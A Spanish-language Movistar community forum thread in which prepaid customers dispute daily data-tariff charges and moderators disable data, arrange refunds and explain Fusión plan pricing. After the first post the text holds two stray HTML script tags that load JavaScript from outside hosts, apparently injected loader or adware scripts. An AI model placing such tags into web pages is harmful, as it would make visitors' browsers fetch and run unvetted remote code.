Recarga de 2,30 euros diarios por renovación de tarifa diaria de datos

fran5
Más integrado que la RDSI
Recarga de 2,30 euros diarios por renovación de tarifa diaria de datos

Tras comprarme el miércoles día 3 de Octubre un Noia C5-03, le puso mi tarjeta prepago y habla ocio y recargué 5 euros. Los días 4 y 5 y realié conexiones internet por wifi ya que no tengo Intenert de datos y en mi zona se captar una wifi abierto. Hoy sábado miro la factura y me han quitado el jueves y el viernes a la misma hora 14.00 la cantidad de 2.30 euros o sea sin contar hoy 4,60 euros por renovación de Tarifa Diaria de Datos. Consultado este foro veo que es un problema frecuente y veo que vía internet lo resuelven rápido  y eficazmente, no obstante llamo al 1004, donde dicen que me han desactivado el gprs y que me acerque al distribuidor más cercano con el nº de cuenta que allí me abonarán la cantidad que me han quitado de la tarjeta y me eliminarán la internet para siempre, pues parece ser que este modelo de nokia se vuelve a actualizar con frecuencia y volveríamos a tener el mismo problema tras la actualización. Tras dos horas de teléfono y tres de espera en la tienda movistar me refieren que alli no tiene esas aplicaciones en el ordenador  y me remiten a una llamada de Pilar que intentará resolverme el problema. lastima mañana perdida, me gustaría que se me aumentara el saldo de la tarjeta que se me ha quitado como se ha hecho a otros clientes y que se le eliminara definitivamene al acceso a internet. gracias.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Mensaje 1 de 16
785 Visitas
15 RESPUESTAS 15
Ana.B-Movistar
Antiguo Moderador

Hola @fran5,

 

Comentarte que aunque te conectes vía wifi, los terminales móviles vienen con un servicio de transmisión de datos que se realiza a través de esa cobertura. Si estando conectado a wifi, la cobertura oscila en algún momento o se pierde o hay interferencias, el teléfono se va a conectar  a través de la re móvil, cargándose el importe correspondiente. Si quieres puedes enviarme un mensaje privado con los datos (nº de teléfono donde te están realizando los cargos, nombre y nif) y comprobamos si podemos ayudarte.

 

Un saludo Emoticono feliz




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 2 de 16
741 Visitas
Ana.B-Movistar
Antiguo Moderador

Hola @fran5,

 

Te he desactivado el servicio de datos del móvil y hemos solicitado se te recargue el importe reclamado que indicas de 4,60 euros (de hecho, ya figura incluido en tu saldo).

 

Un saludo Emoticono feliz




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 3 de 16
731 Visitas
saritz7
Yo probé el VDSL

Tengo el mismo problema desde el dia 20 noviembre, todos los dias me cobran esta tarifa, teniendo encuenta que fuera de casa no me deja entrar a internet y todos los dias he pagado se supone que tendria que poder si previamente he pagado (no es que quiera pero ya que me lo habian cobrado...) espero una solucion rapida por favor y ese dinero que se me devuelva que son 7 dias .......y ya estoy un poquito cansada

Mensaje 4 de 16
656 Visitas
Nuria-Movistar
Antiguo Moderador

 

         Hola @saritz7:

 

Envíame un mp con tu DNI, el número de teléfono y lo miramos. ¿Quieres que te desactivemos también el servicio de GPRS?... En caso afirmativo confírmamelo por mp y lo desactivamos de forma gratuita.

          Un saludo



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 5 de 16
624 Visitas
Nuria-Movistar
Antiguo Moderador

 

       Hola @saritz7:

 

Te acabo de enviar un mp, cuando puedas échale un vistazo.

      Salu2Guiño

 



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 6 de 16
606 Visitas
saritz7
Yo probé el VDSL

Nuria, que gusto da encontrar a gente como tu, muy agradecida por todo. Llamar al 1004 es desesperante te sientes impotente como usuario.Ahora solo falta que me ingresen el dinero en la tarjeta.

Muchas gracias.

Mensaje 7 de 16
600 Visitas
Nuria-Movistar
Antiguo Moderador

 

 

      @saritz7, agradecidos nosotros por el uso y confianza que depositas en nuestros servicios Emoticono sacando la lengua . Nos gustaría que nos avises cuando recibas la recarga. No olvides que para cualquier duda/consulta que te pueda surgir, aquí estaremos para echarte una mano en todo lo posible.


        Salu2Guiño



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 8 de 16
585 Visitas
saritz7
Yo probé el VDSL

Nuria, mirame por favor si lo de16€  sigue pendiente de ingresar en la tarjeta o se han olvidado de hacerlo, igual he cantado victoria antes de tiempo. Gracias

Mensaje 9 de 16
567 Visitas
Nuria-Movistar
Antiguo Moderador

 

     Disculpa @saritz7, la recarga la recibirás en las próximas horas... El trámite lo llevamos a cabo correctamente, lo que pasó fué que la solicitud quedó enganchada en el sistema. Emoticono indiferente .. ¿Te importa avisarnos cuando recibas el saldo?. Gracias.

 

       Salu2



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 10 de 16
553 Visitas
saritz7
Yo probé el VDSL

Muchas gracias de nuevo Nuria, hoy me ha llegado la recarga.

Mensaje 11 de 16
550 Visitas
Nuria-Movistar
Antiguo Moderador

 

 

       Muchas gracias a ti @saritz7 por la espera... Perdona por el retraso en la recarga, nos dimos cuenta un poco tarde del error en el sistema Emoticono triste ... No olvides que siempre que te surja una duda, estaremos aquí para echarte una mano en todo lo posible Guiño

 

      Saludotes



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 12 de 16
547 Visitas
saritz7
Yo probé el VDSL

Hola Nuria, quiero hacer fusion con el tfno mio y el de mi hijo, pero este tiene un contrato habla 25 y navega 15 gasto minimo 45 y 2 años de permanencia¿puede ponerlo como 2ª movil a precio 20€? ya que me engañaron con la tarifa y al ir a recoger el movil me dijeron que era otra y al final se queda en lo que te he puesto arriba, osea pagar un paston...

Espero tu respuesta como siempre has hecho. Gracias

Mensaje 13 de 16
519 Visitas
Nuria-Movistar
Antiguo Moderador

 

 

          Hola @saritz7:

 

Si lo que nos preguntas es si en la línea de tu hijo (la que tiene ahora mismo un contrato con gasto mínimo de 45€), la puedes pasar a un gasto mínimo de 20, la respuesta sería que no... Emoticono indiferente .. No podríamos hacer ese cambio... ya que ese gasto mínimo está asociado al compromiso de permanencia y en el caso de modificarlo, estaríamos incumpliendo el mismo. Si quieres que tramitemos el alta en el nuevo plan de Movistar Fusión, tan solo tienes que enviarme un mp con las líneas móviles, la línea fija, el plan de Fusión que deseas contratar y el DNI de la persona titular de las líneas.

 

P.D: Recuerda que en el caso de incluir en Movistar Fusión más de una líneas móvil, las siguientes tendrán una cuota mensual a mayores de 20€ + IVA, por cada línea que desees incluír.

 

       Salu2



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 14 de 16
507 Visitas
saritz7
Yo probé el VDSL

Hola Nuria, no se si te he entendido pues la posdata me ha confundido. Seria hacer la fusion y añadir el telefono de mi hijo.

Y si fuese la linea fija a nombre de mi hijo con su movil y los nuestros tambien a su nombre?

Gracias, espero haberme explicado.

Mensaje 15 de 16
494 Visitas
Nuria-Movistar
Antiguo Moderador

 

 

       Verás @saritz7, lo que te indico en la P.D es lo siguiente... Con el nuevo plan de Movistar Fusión tienes en un principio incluídas una línea Fija y una línea Móvil de CONTRATO... (que tienen que estar a nombre del mismo titular) y después por cada línea móvil adicional que incluyas en el plan, pagarías 20€ más por cada línea (que tendrá que estar también a nombre del mismo titular).

 

        Salu2Guiño



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 16 de 16
481 Visitas